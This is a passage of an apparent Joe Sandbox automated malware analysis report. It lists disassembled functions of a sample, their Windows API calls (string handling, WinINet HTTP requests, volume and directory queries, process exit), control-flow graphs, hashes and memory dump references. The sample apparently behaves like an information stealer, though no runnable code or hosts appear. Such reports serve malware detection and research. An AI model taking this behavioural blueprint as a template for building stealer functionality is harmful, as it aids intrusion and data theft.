                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                • API String ID: 2238633743-3468015613
                                • Opcode ID: 811f377d0f540eea5ac99e24f67d5b994ecb5b883695606d3d5e118023e79084
                                • Instruction ID: d6e7867b91b49e507cc170b5927f16545271cf61b0a008cf66943eeb8dbcdc4f
                                • Opcode Fuzzy Hash: 811f377d0f540eea5ac99e24f67d5b994ecb5b883695606d3d5e118023e79084
                                • Instruction Fuzzy Hash: 6B623CB9611E00EFD754DF64EC8DE2637BAF7A87013148919E956E3364DB34A808FB60
                                Function 003AF1B0 Relevance: 102.7, APIs: 57, Strings: 1, Instructions: 1156stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(003BCFEC), ref: 003AF1D5
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AF1F1
                                • lstrlen.KERNEL32(003BCFEC), ref: 003AF1FC
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AF215
                                • lstrlen.KERNEL32(003BCFEC), ref: 003AF220
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AF239
                                • lstrcpy.KERNEL32(00000000,003C4FA0), ref: 003AF25E
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AF28C
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AF2C0
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AF2F0
                                • lstrlen.KERNEL32(00F654C8), ref: 003AF315
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: ERROR
                                • API String ID: 367037083-2861137601
                                • Opcode ID: 6fae33698a67d2b06170101716f4d5bde988800badfaaa52a229e050b8a9966d
                                • Instruction ID: 067b2971872f6a0c37b63b4a941bd8d134e5ac91fb4aad0ced190a8ed6d6b0cf
                                • Opcode Fuzzy Hash: 6fae33698a67d2b06170101716f4d5bde988800badfaaa52a229e050b8a9966d
                                • Instruction Fuzzy Hash: 0CA27F70901A069FCB22DFA9D849E6AB7F4FF55314F1A8079E809DB261DB31DC46CB90
                                Function 003AFFD0 Relevance: 63.1, APIs: 40, Strings: 1, Instructions: 1571stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B0013
                                • lstrlen.KERNEL32(003BCFEC), ref: 003B00BD
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B00E1
                                • lstrlen.KERNEL32(003BCFEC), ref: 003B00EC
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B0110
                                • lstrlen.KERNEL32(003BCFEC), ref: 003B011B
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B013F
                                • lstrlen.KERNEL32(003BCFEC), ref: 003B015A
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B0189
                                • lstrlen.KERNEL32(003BCFEC), ref: 003B0194
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B01C3
                                • lstrlen.KERNEL32(003BCFEC), ref: 003B01CE
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B0206
                                • lstrlen.KERNEL32(003BCFEC), ref: 003B0250
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B0288
                                • lstrcpy.KERNEL32(00000000,?), ref: 003B059B
                                • lstrlen.KERNEL32(00F65508), ref: 003B05AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 003B05D7
                                • lstrcat.KERNEL32(00000000,?), ref: 003B05E3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B060E
                                • lstrlen.KERNEL32(00F7F568), ref: 003B0625
                                • lstrcpy.KERNEL32(00000000,?), ref: 003B064C
                                • lstrcat.KERNEL32(00000000,?), ref: 003B0658
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B0681
                                • lstrlen.KERNEL32(00F65428), ref: 003B0698
                                • lstrcpy.KERNEL32(00000000,?), ref: 003B06C9
                                • lstrcat.KERNEL32(00000000,?), ref: 003B06D5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B0706
                                • lstrcpy.KERNEL32(00000000,00F78A98), ref: 003B074B
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391557
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391579
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 0039159B
                                  • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 003915FF
                                • lstrcpy.KERNEL32(00000000,?), ref: 003B077F
                                • lstrcpy.KERNEL32(00000000,00F7F5F8), ref: 003B07E7
                                • lstrcpy.KERNEL32(00000000,00F78AB8), ref: 003B0858
                                • lstrcpy.KERNEL32(00000000,fplugins), ref: 003B08CF
                                • lstrcpy.KERNEL32(00000000,?), ref: 003B0928
                                • lstrcpy.KERNEL32(00000000,00F78C18), ref: 003B09F8
                                  • Part of subcall function 003924E0: lstrcpy.KERNEL32(00000000,?), ref: 00392528
                                  • Part of subcall function 003924E0: lstrcpy.KERNEL32(00000000,?), ref: 0039254E
                                  • Part of subcall function 003924E0: lstrcpy.KERNEL32(00000000,?), ref: 00392577
                                • lstrcpy.KERNEL32(00000000,00F78AE8), ref: 003B0ACE
                                • lstrcpy.KERNEL32(00000000,?), ref: 003B0B81
                                • lstrcpy.KERNEL32(00000000,00F78AE8), ref: 003B0D58
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID: fplugins
                                • API String ID: 2500673778-38756186
                                • Opcode ID: 5dfa2ac68dfce4f8803d60418ba9c6315b69cb2a06628df97b62e4fc6a73b195
                                • Instruction ID: 622cf737007ec87097d5021de7db22222cce05a7fd2e52fe4d09b88a3f294d2e
                                • Opcode Fuzzy Hash: 5dfa2ac68dfce4f8803d60418ba9c6315b69cb2a06628df97b62e4fc6a73b195
                                • Instruction Fuzzy Hash: 0CE28D71A053418FC736DF29C499BAAFBE0BF88308F5A856DD58D8B652DB30D845CB42
                                Function 00396C40 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229networkstringfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2234 396c40-396c64 call 392930 2237 396c75-396c97 call 394bc0 2234->2237 2238 396c66-396c6b 2234->2238 2242 396c99 2237->2242 2243 396caa-396cba call 392930 2237->2243 2238->2237 2239 396c6d-396c6f lstrcpy 2238->2239 2239->2237 2244 396ca0-396ca8 2242->2244 2247 396cc8-396cf5 InternetOpenA StrCmpCA 2243->2247 2248 396cbc-396cc2 lstrcpy 2243->2248 2244->2243 2244->2244 2249 396cfa-396cfc 2247->2249 2250 396cf7 2247->2250 2248->2247 2251 396ea8-396ebb call 392930 2249->2251 2252 396d02-396d22 InternetConnectA 2249->2252 2250->2249 2261 396ec9-396ee0 call 392a20 * 2 2251->2261 2262 396ebd-396ebf 2251->2262 2253 396d28-396d5d HttpOpenRequestA 2252->2253 2254 396ea1-396ea2 InternetCloseHandle 2252->2254 2256 396d63-396d65 2253->2256 2257 396e94-396e9e InternetCloseHandle 2253->2257 2254->2251 2259 396d7d-396dad HttpSendRequestA HttpQueryInfoA 2256->2259 2260 396d67-396d77 InternetSetOptionA 2256->2260 2257->2254 2263 396daf-396dd3 call 3b71e0 call 392a20 * 2 2259->2263 2264 396dd4-396de4 call 3b3d90 2259->2264 2260->2259 2262->2261 2265 396ec1-396ec3 lstrcpy 2262->2265 2264->2263 2275 396de6-396de8 2264->2275 2265->2261 2276 396e8d-396e8e InternetCloseHandle 2275->2276 2277 396dee-396e07 InternetReadFile 2275->2277 2276->2257 2277->2276 2279 396e0d 2277->2279 2281 396e10-396e15 2279->2281 2281->2276 2283 396e17-396e3d call 3b7310 2281->2283 2286 396e3f call 392a20 2283->2286 2287 396e44-396e51 call 392930 2283->2287 2286->2287 2291 396e61-396e8b call 392a20 InternetReadFile 2287->2291 2292 396e53-396e57 2287->2292 2291->2276 2291->2281 2292->2291 2293 396e59-396e5b lstrcpy 2292->2293 2293->2291
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00396C6F
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00396CC2
                                • InternetOpenA.WININET(003BCFEC,00000001,00000000,00000000,00000000), ref: 00396CD5
                                • StrCmpCA.SHLWAPI(?,00F7FC90), ref: 00396CED
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00396D15
                                • HttpOpenRequestA.WININET(00000000,GET,?,00F7F610,00000000,00000000,-00400100,00000000), ref: 00396D50
                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00396D77
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00396D86
                                • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00396DA5
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00396DFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00396E5B
                                • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00396E7D
                                • InternetCloseHandle.WININET(00000000), ref: 00396E8E
                                • InternetCloseHandle.WININET(?), ref: 00396E98
                                • InternetCloseHandle.WININET(00000000), ref: 00396EA2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00396EC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                • String ID: ERROR$GET
                                • API String ID: 3687753495-3591763792
                                • Opcode ID: 3db69fbaee61ad8a42e8244db203cd2799e42e54074dfb9a37242058ab8e7f2b
                                • Instruction ID: 32a4ea8aadd2889ff7ee7939f8349e168157ef850856e37cfeb25a7a878f7235
                                • Opcode Fuzzy Hash: 3db69fbaee61ad8a42e8244db203cd2799e42e54074dfb9a37242058ab8e7f2b
                                • Instruction Fuzzy Hash: 92818075E12615AFEF21DFA4DC4AFAE77B8AF44700F154058F905EB280DB70AD048B90
                                Function 003AF2F8 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 391stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00F654C8), ref: 003AF315
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AF3A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AF3C7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AF47B
                                • lstrcpy.KERNEL32(00000000,00F654C8), ref: 003AF4BB
                                • lstrcpy.KERNEL32(00000000,00F789C8), ref: 003AF4EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AF59E
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003AF61C
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AF64C
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AF69A
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 003AF718
                                • lstrlen.KERNEL32(00F78A88), ref: 003AF746
                                • lstrcpy.KERNEL32(00000000,00F78A88), ref: 003AF771
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AF793
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AF7E4
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 003AFA32
                                • lstrlen.KERNEL32(00F78958), ref: 003AFA60
                                • lstrcpy.KERNEL32(00000000,00F78958), ref: 003AFA8B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AFAAD
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AFAFE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: ERROR
                                • API String ID: 367037083-2861137601
                                • Opcode ID: a09326d384c1f990cec498d5d537d0d29ca44fc91c6151dcbe19d1197b4f8986
                                • Instruction ID: f095f7110ca07cda006a4c8cedfd58fe3c3bdb4c0ec5f536e739f26190f051d4
                                • Opcode Fuzzy Hash: a09326d384c1f990cec498d5d537d0d29ca44fc91c6151dcbe19d1197b4f8986
                                • Instruction Fuzzy Hash: 5AF12B70A01602CFCB26DFA9C848A6AB7F5FF55314B1A81BDD4099B2A1D736DC46CB90
                                Function 003A8CA0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2721 3a8ca0-3a8cc4 StrCmpCA 2722 3a8ccd-3a8ce6 2721->2722 2723 3a8cc6-3a8cc7 ExitProcess 2721->2723 2725 3a8cec-3a8cf1 2722->2725 2726 3a8ee2-3a8eef call 392a20 2722->2726 2727 3a8cf6-3a8cf9 2725->2727 2729 3a8cff 2727->2729 2730 3a8ec3-3a8edc 2727->2730 2732 3a8d5a-3a8d69 lstrlen 2729->2732 2733 3a8dbd-3a8dcb StrCmpCA 2729->2733 2734 3a8ddd-3a8deb StrCmpCA 2729->2734 2735 3a8dfd-3a8e0b StrCmpCA 2729->2735 2736 3a8e1d-3a8e2b StrCmpCA 2729->2736 2737 3a8e3d-3a8e4b StrCmpCA 2729->2737 2738 3a8d30-3a8d3f lstrlen 2729->2738 2739 3a8e56-3a8e64 StrCmpCA 2729->2739 2740 3a8e88-3a8e9a lstrlen 2729->2740 2741 3a8e6f-3a8e7d StrCmpCA 2729->2741 2742 3a8d06-3a8d15 lstrlen 2729->2742 2743 3a8d84-3a8d92 StrCmpCA 2729->2743 2744 3a8da4-3a8db8 StrCmpCA 2729->2744 2730->2726 2770 3a8cf3 2730->2770 2756 3a8d6b-3a8d70 call 392a20 2732->2756 2757 3a8d73-3a8d7f call 392930 2732->2757 2733->2730 2760 3a8dd1-3a8dd8 2733->2760 2734->2730 2761 3a8df1-3a8df8 2734->2761 2735->2730 2745 3a8e11-3a8e18 2735->2745 2736->2730 2746 3a8e31-3a8e38 2736->2746 2737->2730 2747 3a8e4d-3a8e54 2737->2747 2754 3a8d49-3a8d55 call 392930 2738->2754 2755 3a8d41-3a8d46 call 392a20 2738->2755 2739->2730 2750 3a8e66-3a8e6d 2739->2750 2752 3a8e9c-3a8ea1 call 392a20 2740->2752 2753 3a8ea4-3a8eb0 call 392930 2740->2753 2741->2730 2751 3a8e7f-3a8e86 2741->2751 2748 3a8d1f-3a8d2b call 392930 2742->2748 2749 3a8d17-3a8d1c call 392a20 2742->2749 2743->2730 2759 3a8d98-3a8d9f 2743->2759 2744->2730 2745->2730 2746->2730 2747->2730 2779 3a8eb3-3a8eb5 2748->2779 2749->2748 2750->2730 2751->2730 2752->2753 2753->2779 2754->2779 2755->2754 2756->2757 2757->2779 2759->2730 2760->2730 2761->2730 2770->2727 2779->2730 2780 3a8eb7-3a8eb9 2779->2780 2780->2730 2781 3a8ebb-3a8ebd lstrcpy 2780->2781 2781->2730
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: 1f993c23bdba283c8a78738cb9ef7f2d69bd035e4f263b350f5a42409f4e3d40
                                • Instruction ID: ceaccbe4594265aa5eef4c17cbda29794627e1dbbfb986500b80e5052f78a32d
                                • Opcode Fuzzy Hash: 1f993c23bdba283c8a78738cb9ef7f2d69bd035e4f263b350f5a42409f4e3d40
                                • Instruction Fuzzy Hash: EC517FB1A04B01EFCB229F75DC8CEAB7BF8FB15700B10481DE442D6610DB74D9459BA1
                                Function 003B2740 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2782 3b2740-3b2783 GetWindowsDirectoryA 2783 3b278c-3b27ea GetVolumeInformationA 2782->2783 2784 3b2785 2782->2784 2785 3b27ec-3b27f2 2783->2785 2784->2783 2786 3b2809-3b2820 GetProcessHeap RtlAllocateHeap 2785->2786 2787 3b27f4-3b2807 2785->2787 2788 3b2822-3b2824 2786->2788 2789 3b2826-3b2844 wsprintfA 2786->2789 2787->2785 2790 3b285b-3b2872 call 3b71e0 2788->2790 2789->2790
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 003B277B
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,003A93B6,00000000,00000000,00000000,00000000), ref: 003B27AC
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003B280F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003B2816
                                • wsprintfA.USER32 ref: 003B283B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
